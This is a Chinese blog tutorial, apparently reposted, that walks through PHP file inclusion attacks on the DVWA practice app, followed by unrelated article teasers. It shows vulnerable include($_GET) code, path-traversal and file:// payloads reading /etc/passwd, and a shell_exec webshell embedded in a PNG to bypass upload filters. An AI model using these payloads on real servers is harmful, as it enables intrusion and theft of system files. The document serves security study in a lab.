web漏洞之文件包含漏洞

一、文件包含漏洞

1、把DVWA页面改为low级别,然后点击File Inclusion页面

文件包含漏洞有四种include()/require()/include_once()/require_once()
常见的文件包含漏洞代码如下
<?php$file=$_GET['filename'];     filename随意定义include($file);
?>
-----------------------------------------
<?phpinclude $_GET['test'];       test随意定义
?>
------------------------------------------
原理是当访问一个包含文件包含漏洞的php页面时,比如DVWA的File Inclusion页面访问的是low.php和include.php,这两个页面包含了include($_GET['page'])这句话,意思是page会把用户输入的参数带进来然后由$_GET读取,最后交给include()函数把传参转换成php语言执行,比如用户输入http://dvwa/include.php/?page=../../webshell.php就等于 include(../../webshell.php),只要访问的php页面包含include($_GET['page'])就可以进行文件包含漏洞渗透操作。include($_GET['page']) 中的page可以随便定义只要和用户输入的page保持一致即可
?page=../../ 或 ?page=/etc/passwd 都属于相对路径,意思是从当前目录开始查看
?page=file:///etc/passwd 通过file://的方式属于绝对路径
?page=http://                   通过http://远程执行php文件属于远程文件包含漏洞
-----------------------------------------------------------------------
(1) 先上传一个webshell.php文件到file upload页面(2) 然后在file inclusion页面访问如下url执行这个webshell.php文件http://192.168.1.107/DVWA/vulnerabilities/fi/?page=../../hackable/uploads/webshell.php或http://192.168.1.107/DVWA/vulnerabilities/fi/?page=../../../../../../etc/passwd也可以使用绝对路径http://192.168.1.107/DVWA/vulnerabilities/fi/?page=file:///etc/passwd或使用http://http://192.168.1.107/DVWA/vulnerabilities/fi/?page=http://192.168.1.107/DVWA/hackable/uploads/webshell.php(3) 如果网站不允许上传.php文件可以把webshell嵌入到图片中执行cat 1.png webshell.php > 2.pnghttp://192.168.1.107/DVWA/vulnerabilities/fi/?page=../../hackable/uploads/2.png

2、如果把dvwa的级别提高到High,那么再上传webshell.php就会失败,此时就只能上传png/jpg文件才可以

(1) 先准备好2.png图片然后把webshell.php的代码植入到3.png图片中
webshell:
<?php echo shell_exec("df"); ?>
windows:
Copy b/ 2.png+webshell.php 3.png   
mac/linux:顺序不要搞反了
cat 2.png webshell.php > 3.png(2) 上传3.png到DVWA
访问3.png正常显示图片:
http://192.168.1.107/DVWA/hackable/uploads/3.png(3) 利用文件包含漏洞进行渗透(需要提前知道你上传图片的路径)
http://192.168.1.107/DVWA/vulnerabilities/fi/?page=file:///var/www/html/DVWA/hackable/uploads/3.png
DVWA为了方便用户学习会主动句提供文件包含漏洞模块fi/?page=来帮助用户学习
或者
http://192.168.1.107/DVWA/vulnerabilities/fi/?page=file:///etc/passwd
file://: 表示系统文件的绝对路径,这里只能用绝对路径因为级别是High

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/65293.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

小程序与物联网(IoT)融合:开启智能生活新篇章

小程序与物联网(IoT)融合:开启智能生活新篇章

一、引言 随着移动互联网技术的飞速发展&#xff0c;小程序作为一种轻量级的应用形式&#xff0c;凭借其无需下载安装、即用即走的特点&#xff0c;迅速渗透到人们生活的各个领域。与此同时&#xff0c;物联网&#xff08;IoT&#xff09;技术也在不断进步&#xff0c;将各种物…
阅读更多...
Ubuntu无法创建python venv环境

Ubuntu无法创建python venv环境

排查步骤如下 1. python3 -m venv venv he virtual environment was not created successfully because ensurepip is not available. On Debian/Ubuntu systems, you need to install the python3-venv package using the following command.apt install python3.8-venvYou…
阅读更多...
如何很快将文件转换成另外一种编码格式?编码?按指定编码格式编译?如何检测文件编码格式?Java .class文件编码和JVM运行期内存编码?

如何很快将文件转换成另外一种编码格式?编码?按指定编码格式编译?如何检测文件编码格式?Java .class文件编码和JVM运行期内存编码?

如何很快将文件转换成另外一种编码格式? 利用VS Code右下角的"选择编码"功能&#xff0c;选择"通过编码保存"可以很方便将文件转换成另外一种编码格式。尤其&#xff0c;在测试w/ BOM或w/o BOM, 或者ANSI编码和UTF编码转换&#xff0c;特别方便。VS文件另…
阅读更多...
PCL点云库入门——PCL库点云特征之PFH点特征直方图(Point Feature Histograms -PHF)

PCL点云库入门——PCL库点云特征之PFH点特征直方图(Point Feature Histograms -PHF)

1、算法原理 PFH点&#xff08;Point Feature Histogram&#xff09;特征直方图的原理涉及利用参数化查询点与邻域点之间的空间差异&#xff0c;并构建一个多维直方图以捕捉点的k邻域几何属性。这个高维超空间为特征表示提供了一个可度量的信息空间&#xff0c;对于点云对应曲面…
阅读更多...
5. CSS引入方式

5. CSS引入方式

5.1 CSS的三种样式 按照 CSS 样式书写的位置(或者引入的方式)&#xff0c;CSS样式表可以分为三大类&#xff1a; 1.行内样式表&#xff08;行内式&#xff09; 2.内部样式表&#xff08;嵌入式&#xff09; 3. 外部样式表&#xff08;链接式&#xff09; 5.2 内部样式表 …
阅读更多...
为什么ip属地一会河南一会江苏

为什么ip属地一会河南一会江苏

在使用互联网的过程中&#xff0c;许多用户可能会遇到这样一个问题&#xff1a;自己的IP属地一会儿显示为河南&#xff0c;一会儿又变成了江苏。这种现象可能会让人感到困惑&#xff0c;甚至产生疑虑&#xff0c;担心自己的网络活动是否受到了某种影响。为了解答这一疑问&#…
阅读更多...
unity3d-搞个场景漫游如何实现Alpha

unity3d-搞个场景漫游如何实现Alpha

要处理两个问题&#xff1a; 如何设置地面人不掉下去 方法一、 游戏物体加刚体&#xff0c;将游戏物体和地面加collider。如果是地形&#xff0c;可以使用 Terrain Collider&#xff1b;如果是简单的平面&#xff0c;可以添加 Box Collider 或者 Mesh Collider&#xff08;如果…
阅读更多...
git merge rebase

git merge rebase

merge操作 Git自己分支合并dev分支 rebase 操作 git rebase
阅读更多...
doris 2.1 temporay partition 测试及总结

doris 2.1 temporay partition 测试及总结

测试步骤 创建表 drop table order_info_shuffle; CREATE TABLE order_info_shuffle ( order_id varchar(20), user_id varchar(20), goods_id
阅读更多...
jmeter性能测试例子

jmeter性能测试例子

目录 一、介绍 二、操作例子 设置线程数 添加同步定时器 添加聚合报告 一、介绍 在软件测试中&#xff0c;一般用jmeter来对接口做性能测试&#xff0c;对对接口进行一个压力的测试。 简述&#xff1a; 在接口的线程中设置线程的数量和时间&#xff0c;添加一个定时器…
阅读更多...
C# 设计模式(行为型模式):解释器模式

C# 设计模式(行为型模式):解释器模式

C# 设计模式&#xff08;行为型模式&#xff09;&#xff1a;解释器模式 (Interpreter Pattern) 什么是解释器模式&#xff1f; 解释器模式&#xff08;Interpreter Pattern&#xff09;是一种行为型设计模式&#xff0c;用于定义一种语言的语法表示&#xff0c;并提供一个解释…
阅读更多...
ubuntu16 重启之后lvm信息丢失故障恢复

ubuntu16 重启之后lvm信息丢失故障恢复

一、背景 1、问题背景 业务有一台物理开发服务器&#xff0c;文件系统有损坏&#xff1b;由于重启时没有检查&#xff0c;导致重启卡住。后面通过断电重新启动之后&#xff0c;无法进入系统&#xff1b;进入救援模式&#xff0c;注释数据盘挂载。重启之后进入系统&#xff0c…
阅读更多...
React函数组件中与生命周期相关Hooks详解

React函数组件中与生命周期相关Hooks详解

React 函数组件及其钩子渲染流程是 React 框架中的核心概念之一。以下是对该流程的详细解析&#xff1a; 一、React 函数组件基础 定义&#xff1a; React 函数组件是一个接收 props 作为参数并返回 React 元素的函数。它们通常用于表示 UI 的一部分&#xff0c;并且不保留内部…
阅读更多...
水一篇水水水

水一篇水水水

为了拿推广卷&#xff0c;但不想把我原本完整的文章拆成零散的多篇&#xff0c;只能出此下策随便发一篇&#xff0c;认真写的都笔记专栏里 网络是由若干节点和连接这些节点的链路构成&#xff0c;表示诸多对象及其相互联系。 在1999年之前&#xff0c;人们一般认为网络的结构都…
阅读更多...
PDFelement 特别版

PDFelement 特别版

Wondershare PDFelement Pro 是一款非常强大的PDF编辑软件&#xff0c;它允许用户轻松地编辑、转换、创建和管理PDF文件。这个中文特别版的软件具有许多令人印象深刻的功能&#xff0c;PDFelement Pro 提供了丰富的编辑功能&#xff0c;可以帮助用户直接在PDF文件中添加、删除、…
阅读更多...
C语言的正则表达式

C语言的正则表达式

C语言中的正则表达式 引言 正则表达式是一种用于描述字符串模式的工具&#xff0c;它可以用来进行字符串匹配、查找、替换等操作。在编程中&#xff0c;正则表达式被广泛应用于数据验证、信息提取等场景。C语言虽然没有内置的正则表达式支持&#xff0c;但通过一些库我们同样…
阅读更多...
【OpenCV】使用Python和OpenCV实现火焰检测

【OpenCV】使用Python和OpenCV实现火焰检测

1、 项目源码和结构&#xff08;转&#xff09; https://github.com/mushfiq1998/fire-detection-python-opencv 2、 运行环境 # 安装playsound&#xff1a;用于播放报警声音 pip install playsound # 安装opencv-python&#xff1a;cv2用于图像和视频处理&#xff0c;特别是…
阅读更多...
GO随想:GO的并发等待

GO随想:GO的并发等待

协程并发等待技术——WaitGroup 类型和 errgroup 包 waitgroup 阻塞等待多个并发任务执行完成。WaitGroup 类型主要包含下面几个方法。 func (wg *WaitGroup) Add(delta int) func (wg *WaitGroup) Done() func (wg *WaitGroup) Wait() 第一个是 Add 方法&#xff0c;在任务运…
阅读更多...
深入理解Mybatis原理》MyBatis的sqlSessi

深入理解Mybatis原理》MyBatis的sqlSessi

sqlSessionFactory 与 SqlSession 正如其名&#xff0c;Sqlsession对应着一次数据库会话。由于数据库会话不是永久的&#xff0c;因此Sqlsession的生命周期也不应该是永久的&#xff0c;相反&#xff0c;在你每次访问数据库时都需要创建它&#xff08;当然并不是说在Sqlsession…
阅读更多...
《HarmonyOS第一课》焕新升级,赋能开发者快速掌握鸿蒙应用开发

《HarmonyOS第一课》焕新升级,赋能开发者快速掌握鸿蒙应用开发

随着HarmonyOS NEXT发布&#xff0c;鸿蒙生态日益壮大&#xff0c;广大开发者对于系统化学习平台和课程的需求愈发强烈。近日&#xff0c;华为精心打造的《HarmonyOS第一课》全新上线&#xff0c;集“学、练、考”于一体&#xff0c;凭借多维融合的教学模式与系统课程设置&…
阅读更多...
最新文章

Copyright @ 2022~2023